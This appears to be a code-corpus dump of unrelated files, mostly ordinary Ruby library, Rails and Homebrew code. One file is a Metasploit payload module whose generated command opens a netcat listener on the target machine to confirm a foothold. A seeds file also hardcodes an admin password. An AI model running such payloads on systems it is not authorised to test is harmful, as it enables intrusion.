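# Illustrative sketch (an assumption, not part of the gem): a plain ActiveModel
# class whose validators feed client_side_validation_hash.
#
#   class Widget
#     include ActiveModel::Model
#     attr_accessor :name
#     validates :name, presence: true, length: { maximum: 10 }
#   end
#
#   # Keys are attribute names; values group validator options by kind, e.g.
#   # { name: { presence: [{ message: "can't be blank" }], length: [...] } }
#   Widget.new.client_side_validation_hash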
| 28.708791 | 154 | 0.631388 |
abfefd2d50735829d510afdc1a27e7901a63bbdd
| 3,407 |
# encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Web::Mgmt::V2020_09_01
module Models
#
# Body of the error response returned from the API.
#
class ErrorEntity
include MsRestAzure
# @return [String] Type of error.
attr_accessor :extended_code
# @return [String] Message template.
attr_accessor :message_template
# @return [Array<String>] Parameters for the template.
attr_accessor :parameters
# @return [Array<ErrorEntity>] Inner errors.
attr_accessor :inner_errors
# @return [String] Basic error code.
attr_accessor :code
# @return [String] Any details of the error.
attr_accessor :message
#
# Mapper for ErrorEntity class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'ErrorEntity',
type: {
name: 'Composite',
class_name: 'ErrorEntity',
model_properties: {
extended_code: {
client_side_validation: true,
required: false,
serialized_name: 'extendedCode',
type: {
name: 'String'
}
},
message_template: {
client_side_validation: true,
required: false,
serialized_name: 'messageTemplate',
type: {
name: 'String'
}
},
parameters: {
client_side_validation: true,
required: false,
serialized_name: 'parameters',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'StringElementType',
type: {
name: 'String'
}
}
}
},
inner_errors: {
client_side_validation: true,
required: false,
serialized_name: 'innerErrors',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'ErrorEntityElementType',
type: {
name: 'Composite',
class_name: 'ErrorEntity'
}
}
}
},
code: {
client_side_validation: true,
required: false,
serialized_name: 'code',
type: {
name: 'String'
}
},
message: {
client_side_validation: true,
required: false,
serialized_name: 'message',
type: {
name: 'String'
}
}
}
}
}
end
end
end
end
| 28.630252 | 70 | 0.449662 |
ff96bba7917f75588130886b5fd8f35514c00df9
| 2,444 |
require 'statsample-glm/glm/irls/logistic'
require 'statsample-glm/glm/irls/poisson'
require 'statsample-glm/glm/mle/logistic'
require 'statsample-glm/glm/mle/probit'
require 'statsample-glm/glm/mle/normal'
module Statsample
module GLM
class Base
def initialize ds, y, opts={}
@opts = opts
set_default_opts_if_any
@data_set = ds.dup(ds.vectors.to_a - [y])
@dependent = ds[y]
add_constant_vector if @opts[:constant]
add_constant_vector(1) if self.is_a? Statsample::GLM::Normal
algorithm = @opts[:algorithm].upcase
method = @opts[:method].capitalize
# TODO: Remove this const_get jugaad after 1.9.3 support is removed.
@regression = Kernel.const_get("Statsample").const_get("GLM")
.const_get("#{algorithm}").const_get("#{method}")
.new(@data_set, @dependent, @opts)
end
def coefficients as_a=:array
if as_a == :hash
c = {}
@data_set.vectors.to_a.each_with_index do |f,i|
c[f.to_sym] = @regression.coefficients[i]
end
return c
end
create_vector @regression.coefficients
end
def standard_error as_a=:array
if as_a == :hash
se = {}
@data_set.vectors.to_a.each_with_index do |f,i|
se[f.to_sym] = @regression.standard_error[i]
end
return se
end
create_vector @regression.standard_error
end
def iterations
@regression.iterations
end
def fitted_mean_values
@regression.fitted_mean_values
end
def residuals
@regression.residuals
end
def degree_of_freedom
@regression.degree_of_freedom
end
def log_likelihood
@regression.log_likelihood if @opts[:algorithm] == :mle
end
private
def set_default_opts_if_any
@opts[:algorithm] ||= :irls
@opts[:iterations] ||= 100
@opts[:epsilon] ||= 1e-7
@opts[:link] ||= :log
end
def create_vector arr
Daru::Vector.new(arr)
end
def add_constant_vector x=nil
@data_set.add_vector :constant, [@opts[:constant]]*@data_set.nrows
unless x.nil?
@data_set.add_vector :constant, [1]*@data_set.nrows
end
end
end
end
end
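# Illustrative usage sketch (not part of the original file; assumes the gem's
# top-level compute helper and a Daru::DataFrame `df` containing a :y column):
#
#   glm = Statsample::GLM.compute(df, :y, :logistic, constant: 1)
#   glm.coefficients(:hash)  # => { constant: ..., x1: ..., ... }
#   glm.standard_error
#   glm.iterations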
| 25.195876 | 77 | 0.578969 |
bb1cb15c5e936ccb34be3e134a8081648c178e1d
| 1,913 |
require File.expand_path('../boot', __FILE__)
require 'active_model/railtie'
require 'active_record/railtie'
require 'action_controller/railtie'
require 'action_view/railtie'
require 'action_mailer/railtie'
Bundler.require
require 'has_accounts'
module Dummy
class Application < Rails::Application
# Settings in config/environments/* take precedence over those specified here.
# Application configuration should go into files in config/initializers
# -- all .rb files in that directory are automatically loaded.
# Custom directories with classes and modules you want to be autoloadable.
# config.autoload_paths += %W(#{config.root}/extras)
# Only load the plugins named here, in the order given (default is alphabetical).
# :all can be used as a placeholder for all plugins not explicitly named.
# config.plugins = [ :exception_notification, :ssl_requirement, :all ]
# Activate observers that should always be running.
# config.active_record.observers = :cacher, :garbage_collector, :forum_observer
# Set Time.zone default to the specified zone and make Active Record auto-convert to this zone.
# Run "rake -D time" for a list of tasks for finding time zone names. Default is UTC.
# config.time_zone = 'Central Time (US & Canada)'
# The default locale is :en and all translations from config/locales/*.rb,yml are auto loaded.
# config.i18n.load_path += Dir[Rails.root.join('my', 'locales', '*.{rb,yml}').to_s]
# config.i18n.default_locale = :de
# JavaScript files you want as :defaults (application.js is always included).
# config.action_view.javascript_expansions[:defaults] = %w(jquery rails)
# Configure the default encoding used in templates for Ruby 1.9.
config.encoding = 'utf-8'
# Configure sensitive parameters which will be filtered from the log file.
config.filter_parameters += [:password]
end
end
| 41.586957 | 99 | 0.734971 |
7a81827388a006fac41cca985bbe5aedc0efbbf8
| 8,566 |
=begin
#Selling Partner API for Direct Fulfillment Transaction Status
#The Selling Partner API for Direct Fulfillment Transaction Status provides programmatic access to a direct fulfillment vendor's transaction status.
OpenAPI spec version: v1
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 3.0.33
=end
require 'date'
module AmzSpApi::VendorDirectFulfillmentTransactionsV1
# The transaction status details.
class Transaction
# The unique identifier sent in the 'transactionId' field in response to the post request of a specific transaction.
attr_accessor :transaction_id
# Current processing status of the transaction.
attr_accessor :status
attr_accessor :errors
class EnumAttributeValidator
attr_reader :datatype
attr_reader :allowable_values
def initialize(datatype, allowable_values)
@allowable_values = allowable_values.map do |value|
case datatype.to_s
when /Integer/i
value.to_i
when /Float/i
value.to_f
else
value
end
end
end
def valid?(value)
!value || allowable_values.include?(value)
end
end
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'transaction_id' => :'transactionId',
:'status' => :'status',
:'errors' => :'errors'
}
end
# Attribute type mapping.
def self.openapi_types
{
:'transaction_id' => :'Object',
:'status' => :'Object',
:'errors' => :'Object'
}
end
# List of attributes with nullable: true
def self.openapi_nullable
Set.new([
])
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
if (!attributes.is_a?(Hash))
fail ArgumentError, "The input argument (attributes) must be a hash in `AmzSpApi::VendorDirectFulfillmentTransactionsV1::Transaction` initialize method"
end
# check to see if the attribute exists and convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h|
if (!self.class.attribute_map.key?(k.to_sym))
fail ArgumentError, "`#{k}` is not a valid attribute in `AmzSpApi::VendorDirectFulfillmentTransactionsV1::Transaction`. Please check the name to make sure it's valid. List of attributes: " + self.class.attribute_map.keys.inspect
end
h[k.to_sym] = v
}
if attributes.key?(:'transaction_id')
self.transaction_id = attributes[:'transaction_id']
end
if attributes.key?(:'status')
self.status = attributes[:'status']
end
if attributes.key?(:'errors')
self.errors = attributes[:'errors']
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
if @transaction_id.nil?
invalid_properties.push('invalid value for "transaction_id", transaction_id cannot be nil.')
end
if @status.nil?
invalid_properties.push('invalid value for "status", status cannot be nil.')
end
invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
return false if @transaction_id.nil?
return false if @status.nil?
status_validator = EnumAttributeValidator.new('Object', ['Failure', 'Processing', 'Success'])
return false unless status_validator.valid?(@status)
true
end
# Custom attribute writer method checking allowed values (enum).
# @param [Object] status Object to be assigned
def status=(status)
validator = EnumAttributeValidator.new('Object', ['Failure', 'Processing', 'Success'])
unless validator.valid?(status)
fail ArgumentError, "invalid value for \"status\", must be one of #{validator.allowable_values}."
end
@status = status
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
transaction_id == o.transaction_id &&
status == o.status &&
errors == o.errors
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Integer] Hash code
def hash
[transaction_id, status, errors].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def self.build_from_hash(attributes)
new.build_from_hash(attributes)
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.openapi_types.each_pair do |key, type|
if type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
elsif attributes[self.class.attribute_map[key]].nil? && self.class.openapi_nullable.include?(key)
self.send("#{key}=", nil)
end
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :DateTime
DateTime.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :Boolean
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
AmzSpApi::VendorDirectFulfillmentTransactionsV1.const_get(type).build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
if value.nil?
is_nullable = self.class.openapi_nullable.include?(attr)
next if !is_nullable || (is_nullable && !instance_variable_defined?(:"@#{attr}"))
end
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
    end
  end
end
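# Illustrative usage (the field values below are hypothetical):
#   txn = AmzSpApi::VendorDirectFulfillmentTransactionsV1::Transaction.new(
#     transaction_id: 'vendor-txn-123', status: 'Processing')
#   txn.valid? #=> true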
| 31.492647 | 238 | 0.634368 |
f793c84700676c02cb1245a60458a575fd519887
| 1,255 |
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/base/sessions/pingback'
module MetasploitModule
CachedSize = 103
include Msf::Payload::Single
include Msf::Payload::Pingback
include Msf::Payload::Pingback::Options
def initialize(info = {})
super(merge_info(info,
'Name' => 'Unix Command Shell, Pingback Bind TCP (via netcat)',
'Description' => 'Accept a connection, send a UUID, then exit',
'Author' =>
[
'asoto-r7'
],
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Handler' => Msf::Handler::BindTcp,
'Session' => Msf::Sessions::Pingback,
'PayloadType' => 'cmd',
'RequiredCmd' => 'netcat'
))
end
#
# Constructs the payload
#
def generate
super.to_s + command_string
end
#
# Returns the command string to use for execution
#
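  # For example, with LPORT set to 4444 and a hypothetical UUID of "deadbeef",
  # the generated command would be:
  #   printf '\xde\xad\xbe\xef' | (nc -lp 4444 || nc -l 4444)
  #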
def command_string
self.pingback_uuid ||= self.generate_pingback_uuid
"printf '#{pingback_uuid.scan(/../).map { |x| "\\x" + x }.join}' | (nc -lp #{datastore['LPORT']} || nc -l #{datastore['LPORT']})"
end
end
| 25.612245 | 133 | 0.594422 |
08a5632f930f7009e935af1ef62d5f34e8e1fb14
| 44 |
module CivicSummary
VERSION = '0.0.1'
end
| 11 | 19 | 0.704545 |
6249d0ab1f23492240dd44e8f5323ad07a630759
| 1,407 |
#-- copyright
# OpenProject Global Roles Plugin
#
# Copyright (C) 2010 - 2014 the OpenProject Foundation (OPF)
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# version 3.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#++
require File.dirname(__FILE__) + '/../spec_helper'
describe Principal, type: :model do
describe 'ATTRIBUTES' do
before :each do
end
it { is_expected.to have_many :principal_roles }
it { is_expected.to have_many :global_roles }
end
describe 'WHEN deleting a principal' do
let(:principal) { FactoryBot.build(:user) }
let(:role) { FactoryBot.build(:global_role) }
before do
FactoryBot.create(:principal_role, role: role,
principal: principal)
principal.destroy
end
it { expect(Role.find_by_id(role.id)).to eq(role) }
it { expect(PrincipalRole.where(id: principal.id)).to eq([]) }
end
end
| 31.266667 | 81 | 0.697939 |
bf33bffe64ac5b5e1e1d346067a117045797f494
| 648 |
# This file should contain all the record creation needed to seed the database with its default values.
# The data can then be loaded with the rake db:seed (or created alongside the db with db:setup).
#
# Examples:
#
# cities = City.create([{ name: 'Chicago' }, { name: 'Copenhagen' }])
# Mayor.create(name: 'Emanuel', city: cities.first)
#
%w(user admin guest).each do |role|
Role.find_or_create_by(name: role)
end
User.create email: '[email protected]', password: '*Test123', role: Role.where(name: 'admin').first, approved: true
User.create email: 'anonymous', password: '*Test123', role: Role.where(name: 'guest').first, approved: false
| 43.2 | 115 | 0.714506 |
62d57e1659333145ee16d5140a0b4580a460485c
| 197 |
class AddOrganizationalDataToCourse < ActiveRecord::Migration[5.2]
def change
add_column :courses, :organizational, :boolean
add_column :courses, :organizational_concept, :text
end
end
| 28.142857 | 66 | 0.77665 |
e8be6cd6014658ba0a6c9f2a579386889ea5b8b8
| 5,587 |
require 'faraday'
require 'glue/finding'
require 'glue/reporters/base_reporter'
require 'jira-ruby'
require 'slack-ruby-client'
require 'glue/util'
require 'glue/env_helper'
# In IRB
# require 'slack-ruby-client'
# Slack.configure do |config|
# config.token = "token"
# end
# client = Slack::Web::Client.new
# client.chat_postMessage(channel: 'channel_name', text: "message_text", attachments: json_attachment, as_user: post_as_user)
PATHNAME_REGEX = %r{(\.\/|#<Pathname:)(?<file_path>.*)(?<file_ext>\.py|\.java|\.class|\.js|\.ts|\.xml)(>)?}
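# Illustrative match: "./src/app/Main.java" yields file_path "src/app/Main"
# and file_ext ".java".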
class Glue::SlackReporter < Glue::BaseReporter
Glue::Reporters.add self
include Glue::Util
include Glue::EnvHelper
attr_accessor :name, :format
def initialize
@name = 'SlackReporter'
@format = :to_slack
@currentpath = __dir__
@git_env = get_git_environment
# OWASP Dependency Check specific settings
if is_label?('java', @tracker) || is_task?('owaspdependencycheck', @tracker)
@sbt_path = @tracker.options[:sbt_path]
@scala_project = @tracker.options[:scala_project]
@gradle_project = @tracker.options[:gradle_project]
@maven_project = @tracker.options[:maven_project]
end
end
def get_slack_attachment_json(finding, tracker)
Glue.notify '**** Generating report data'
json = {
"fallback": 'Results of OWASP Glue test for repository' + tracker.options[:appname] + ':',
"color": slack_priority(finding.severity),
"title": finding.description.to_s,
"title_link": finding.detail.to_s,
"text": finding.detail.to_s
}
end
def get_slack_attachment_text(finding, _tracker)
Glue.notify '**** Generating text attachment'
text =
'Link: ' + bitbucket_linker(finding) + "\n" \
'Vulnerability: ' + finding.description.to_s + "\n" \
      'Severity: ' + slack_priority(finding.severity).to_s + "\n" \
'Detail: ' + "\n" + finding.detail.to_s << "\n"
end
def run_report(tracker)
    # Post as the authenticated user only when explicitly requested.
    post_as_user = tracker.options[:slack_post_as_user] ? true : false
mandatory = %i[slack_token slack_channel]
missing = mandatory.select { |param| tracker.options[param].nil? }
unless missing.empty?
Glue.fatal "missing one or more required params: #{missing}"
return
end
Slack.configure do |config|
config.token = tracker.options[:slack_token]
end
client = Slack::Web::Client.new
begin
client.auth_test
rescue Slack::Web::Api::Error => e
Glue.fatal 'Slack authentication failed: ' << e.to_s
end
reports = []
if tracker.findings.length.zero?
Glue.notify '**** No issues found, skipping report generation...'
else
Glue.notify '**** Running base HTML report'
reports = []
report_filename = "report_#{tracker.options[:appname]}"
template = ERB.new File.read("#{@currentpath}/html_template.erb")
Glue.notify '**** Rendering HTML'
      reports << template.result(binding) # TODO: ugly hack, the binding passed to the template needs to be cleaned up
File.open("#{report_filename}.html", 'w+') { |f| f.write reports.join("\n") }
# runs command to render to PDF
Glue.notify '**** Rendering PDF'
command = "wkhtmltopdf --encoding utf-8 #{report_filename}.html #{report_filename}.pdf"
runsystem(true, command)
end
puts tracker.options[:slack_channel]
begin
Glue.notify '**** Uploading message to Slack'
issue_number = tracker.findings.length
if tracker.findings.length.zero?
Glue.notify '**** No issues found, skipping send report.'
else
Glue.notify '**** Uploading message and attachment to Slack'
client.chat_postMessage(
channel: tracker.options[:slack_channel],
text: 'OWASP Glue has found ' + issue_number.to_s + ' vulnerabilities in *' + tracker.options[:appname] + "* : #{@git_env[:commit]} . \n Here's a summary: \n Link to repo: #{@git_env[:url]}/commits/#{@git_env[:commit]}",
as_user: post_as_user
)
client.files_upload(
channels: tracker.options[:slack_channel],
as_user: true,
file: Faraday::UploadIO.new("#{report_filename}.pdf", 'pdf'),
filetype: 'pdf',
filename: "#{tracker.options[:appname]}.pdf"
)
# if @tracker[:labels].include? 'java' or @tracker[:tasks].include? 'owaspdependencycheck'
# path = if @scala_project
# #md = @result.match(/\e\[0m\[\e\[0minfo\e\[0m\] \e\[0mWriting reports to (?<report_path>.*)\e\[0m/)
# #md[:report_path] + "/dependency-check-report.xml"
# report_directory = @sbt_settings.match(/.*dependencyCheckOutputDirectory: (?<report_path>.*)\e\[0m/)
# report_directory[:report_path] + "/dependency-check-report.xml"
# elsif @gradle_project
# @trigger.path + "/build/reports/dependency-check-report.xml"
# elsif @maven_project
# @trigger.path + "target/dependency-check-report.xml"
# else
# @trigger.path + "/dependency-check-report.xml"
# end
# client.files_upload(
# channels: tracker.options[:slack_channel],
# as_user: true,
# file: Faraday::UploadIO.new("#{report_filename}.pdf", 'pdf'),
# filetype: 'pdf',
# filename: "dep_check_#{tracker.options[:appname]}.pdf"
# )
# end
end
rescue Slack::Web::Api::Error => e
Glue.fatal '***** Post to slack failed: ' << e.to_s
rescue StandardError => e
Glue.fatal '***** Unknown error: ' << e.to_s
end
end
end
| 36.756579 | 230 | 0.632182 |
61b7d76c569060d04e35a87991a70c1a3aaf96a7
| 291 |
require 'open-uri'
class StoriesController < ApplicationController
def index
@stories = HackerNewsAPI.new(story_params).stories
end
def show
@story = HackerNewsAPI.new(story_params).story
end
private
def story_params
params.permit :category, :page, :id
end
end
| 16.166667 | 54 | 0.728522 |
f898b1d2d818165c7e97c176dcf48843f19a3db8
| 1,225 |
require File.dirname(__FILE__) + '/spec_helper'
describe Rack::Throttle::Interval do
include Rack::Test::Methods
def app
@target_app ||= example_target_app
@app ||= Rack::Throttle::Interval.new(@target_app, :min => 0.1)
end
it "should allow the request if the source has not been seen" do
get "/foo"
last_response.body.should show_allowed_response
end
it "should allow the request if the source has not been seen in the current interval" do
get "/foo"
sleep 0.2 # Should time travel this instead?
get "/foo"
last_response.body.should show_allowed_response
end
it "should not all the request if the source has been seen inside the current interval" do
2.times { get "/foo" }
last_response.body.should show_throttled_response
end
it "should gracefully allow the request if the cache bombs on getting" do
app.should_receive(:cache_get).and_raise(StandardError)
get "/foo"
last_response.body.should show_allowed_response
end
it "should gracefully allow the request if the cache bombs on setting" do
app.should_receive(:cache_set).and_raise(StandardError)
get "/foo"
last_response.body.should show_allowed_response
end
end
| 30.625 | 92 | 0.725714 |
b926303d1361da887e4979cbac4dacff5e0fe438
| 8,477 |
require 'formula'
class Subversion < Formula
homepage 'https://subversion.apache.org/'
url 'http://www.apache.org/dyn/closer.cgi?path=subversion/subversion-1.8.10.tar.bz2'
mirror 'http://archive.apache.org/dist/subversion/subversion-1.8.10.tar.bz2'
sha1 'd6896d94bb53c1b4c6e9c5bb1a5c466477b19b2b'
revision 1
bottle do
revision 4
sha1 "91915d626c5e843b2a035e4cfa00898c6c79b353" => :yosemite
sha1 "c0d4416a5dc4db63d37bbfae2af29538699b28ca" => :mavericks
sha1 "7b78b1abd3bb77ef8ee8f711d3bbc0eec8a9390a" => :mountain_lion
end
option :universal
option 'java', 'Build Java bindings'
option 'perl', 'Build Perl bindings'
option 'ruby', 'Build Ruby bindings'
resource 'serf' do
url 'https://serf.googlecode.com/svn/src_releases/serf-1.3.7.tar.bz2', :using => :curl
sha1 'db9ae339dba10a2b47f9bdacf30a58fd8e36683a'
end
depends_on "pkg-config" => :build
# Always build against Homebrew versions instead of system versions for consistency.
depends_on 'sqlite'
depends_on :python => :optional
# Bindings require swig
depends_on 'swig' if build.include? 'perl' or build.with? 'python' or build.include? 'ruby'
# For Serf
depends_on 'scons' => :build
depends_on 'openssl'
# If building bindings, allow non-system interpreters
env :userpaths if build.include? 'perl' or build.include? 'ruby'
# Fix #23993 by stripping flags swig can't handle from SWIG_CPPFLAGS
# Prevent '-arch ppc' from being pulled in from Perl's $Config{ccflags}
patch :DATA
# When building Perl or Ruby bindings, need to use a compiler that
# recognizes GCC-style switches, since that's what the system languages
# were compiled against.
fails_with :clang do
build 318
cause "core.c:1: error: bad value (native) for -march= switch"
end if build.include? 'perl' or build.include? 'ruby'
def install
serf_prefix = libexec+'serf'
resource('serf').stage do
# SConstruct merges in gssapi linkflags using scons's MergeFlags,
# but that discards duplicate values - including the duplicate
# values we want, like multiple -arch values for a universal build.
# Passing 0 as the `unique` kwarg turns this behaviour off.
inreplace 'SConstruct', 'unique=1', 'unique=0'
ENV.universal_binary if build.universal?
# scons ignores our compiler and flags unless explicitly passed
args = %W[PREFIX=#{serf_prefix} GSSAPI=/usr CC=#{ENV.cc}
CFLAGS=#{ENV.cflags} LINKFLAGS=#{ENV.ldflags}
OPENSSL=#{Formula["openssl"].opt_prefix}]
scons *args
scons "install"
end
if build.include? 'unicode-path'
raise <<-EOS.undent
The --unicode-path patch is not supported on Subversion 1.8.
Upgrading from a 1.7 version built with this patch is not supported.
You should stay on 1.7, install 1.7 from homebrew-versions, or
brew rm subversion && brew install subversion
to build a new version of 1.8 without this patch.
EOS
end
if build.include? 'java'
# Java support doesn't build correctly in parallel:
# https://github.com/Homebrew/homebrew/issues/20415
ENV.deparallelize
unless build.universal?
opoo "A non-Universal Java build was requested."
puts "To use Java bindings with various Java IDEs, you might need a universal build:"
puts " brew install subversion --universal --java"
end
if ENV["JAVA_HOME"]
opoo "JAVA_HOME is set. Try unsetting it if JNI headers cannot be found."
end
end
ENV.universal_binary if build.universal?
# Use existing system zlib
# Use dep-provided other libraries
# Don't mess with Apache modules (since we're not sudo)
args = ["--disable-debug",
"--prefix=#{prefix}",
"--with-apr=#{which("apr-1-config").dirname}",
"--with-zlib=/usr",
"--with-sqlite=#{Formula["sqlite"].opt_prefix}",
"--with-serf=#{serf_prefix}",
"--disable-mod-activation",
"--disable-nls",
"--without-apache-libexecdir",
"--without-berkeley-db"]
args << "--enable-javahl" << "--without-jikes" if build.include? 'java'
if build.include? 'ruby'
args << "--with-ruby-sitedir=#{lib}/ruby"
# Peg to system Ruby
args << "RUBY=/usr/bin/ruby"
end
# The system Python is built with llvm-gcc, so we override this
# variable to prevent failures due to incompatible CFLAGS
ENV['ac_cv_python_compile'] = ENV.cc
inreplace 'Makefile.in',
'toolsdir = @bindir@/svn-tools',
'toolsdir = @libexecdir@/svn-tools'
system "./configure", *args
system "make"
system "make install"
bash_completion.install 'tools/client-side/bash_completion' => 'subversion'
system "make tools"
system "make install-tools"
if build.with? 'python'
system "make swig-py"
system "make install-swig-py"
end
if build.include? 'perl'
# In theory SWIG can be built in parallel, in practice...
ENV.deparallelize
# Remove hard-coded ppc target, add appropriate ones
if build.universal?
arches = Hardware::CPU.universal_archs.as_arch_flags
elsif MacOS.version <= :leopard
arches = "-arch #{Hardware::CPU.arch_32_bit}"
else
arches = "-arch #{Hardware::CPU.arch_64_bit}"
end
perl_core = Pathname.new(`perl -MConfig -e 'print $Config{archlib}'`)+'CORE'
unless perl_core.exist?
onoe "perl CORE directory does not exist in '#{perl_core}'"
end
inreplace "Makefile" do |s|
s.change_make_var! "SWIG_PL_INCLUDES",
"$(SWIG_INCLUDES) #{arches} -g -pipe -fno-common -DPERL_DARWIN -fno-strict-aliasing -I/usr/local/include -I#{perl_core}"
end
system "make swig-pl"
system "make", "install-swig-pl", "DESTDIR=#{prefix}"
# Some of the libraries get installed into the wrong place, they end up having the
# prefix in the directory name twice.
lib.install Dir["#{prefix}/#{lib}/*"]
end
if build.include? 'java'
system "make javahl"
system "make install-javahl"
end
if build.include? 'ruby'
# Peg to system Ruby
system "make swig-rb EXTRA_SWIG_LDFLAGS=-L/usr/lib"
system "make install-swig-rb"
end
end
test do
system "#{bin}/svnadmin", 'create', 'test'
system "#{bin}/svnadmin", 'verify', 'test'
end
def caveats
s = <<-EOS.undent
svntools have been installed to:
#{opt_libexec}
EOS
if build.include? 'perl'
s += <<-EOS.undent
The perl bindings are located in various subdirectories of:
#{prefix}/Library/Perl
EOS
end
if build.include? 'ruby'
s += <<-EOS.undent
You may need to add the Ruby bindings to your RUBYLIB from:
#{HOMEBREW_PREFIX}/lib/ruby
EOS
end
if build.include? 'java'
s += <<-EOS.undent
You may need to link the Java bindings into the Java Extensions folder:
sudo mkdir -p /Library/Java/Extensions
sudo ln -s #{HOMEBREW_PREFIX}/lib/libsvnjavahl-1.dylib /Library/Java/Extensions/libsvnjavahl-1.dylib
EOS
end
return s.empty? ? nil : s
end
end
__END__
diff --git a/configure b/configure
index 445251b..3ed9485 100755
--- a/configure
+++ b/configure
@@ -25205,6 +25205,8 @@ fi
SWIG_CPPFLAGS="$CPPFLAGS"
SWIG_CPPFLAGS=`echo "$SWIG_CPPFLAGS" | $SED -e 's/-no-cpp-precomp //'`
+ SWIG_CPPFLAGS=`echo "$SWIG_CPPFLAGS" | $SED -e 's/-F\/[^ ]* //'`
+ SWIG_CPPFLAGS=`echo "$SWIG_CPPFLAGS" | $SED -e 's/-isystem\/[^ ]* //'`
diff --git a/subversion/bindings/swig/perl/native/Makefile.PL.in b/subversion/bindings/swig/perl/native/Makefile.PL.in
index a60430b..bd9b017 100644
--- a/subversion/bindings/swig/perl/native/Makefile.PL.in
+++ b/subversion/bindings/swig/perl/native/Makefile.PL.in
@@ -76,10 +76,13 @@ my $apr_ldflags = '@SVN_APR_LIBS@'
chomp $apr_shlib_path_var;
+my $config_ccflags = $Config{ccflags};
+$config_ccflags =~ s/-arch\s+\S+//g;
+
my %config = (
ABSTRACT => 'Perl bindings for Subversion',
DEFINE => $cppflags,
- CCFLAGS => join(' ', $cflags, $Config{ccflags}),
+ CCFLAGS => join(' ', $cflags, $config_ccflags),
INC => join(' ', $includes, $cppflags,
" -I$swig_srcdir/perl/libsvn_swig_perl",
" -I$svnlib_srcdir/include",
| 32.354962 | 130 | 0.64905 |
189ce05df3e570c129b67bd37407bd64008c8fce
| 1,086 |
require "helper"
class TestCoffeeScript < JekyllUnitTest
context "converting CoffeeScript" do
setup do
External.require_with_graceful_fail("jekyll-coffeescript")
@site = fixture_site
@site.process
@test_coffeescript_file = dest_dir("js/coffeescript.js")
@js_output = <<-JS
(function() {
$(function() {
var cube, cubes, list, num, square;
list = [1, 2, 3, 4, 5];
square = function(x) {
return x * x;
};
cube = function(x) {
return square(x) * x;
};
cubes = (function() {
var i, len, results;
results = [];
for (i = 0, len = list.length; i < len; i++) {
num = list[i];
results.push(math.cube(num));
}
return results;
})();
if (typeof elvis !== "undefined" && elvis !== null) {
return alert("I knew it!");
}
});
}).call(this);
JS
end
should "write a JS file in place" do
assert_exist @test_coffeescript_file
end
should "produce JS" do
assert_equal @js_output, File.read(@test_coffeescript_file)
end
end
end
| 22.625 | 65 | 0.575506 |
62b214081040a6540ce19ad4857274b3e0db1557
| 1,385 |
class Lout < Formula
desc "Text formatting like TeX, but simpler"
homepage "https://savannah.nongnu.org/projects/lout"
url "https://download.savannah.gnu.org/releases/lout/lout-3.40.tar.gz"
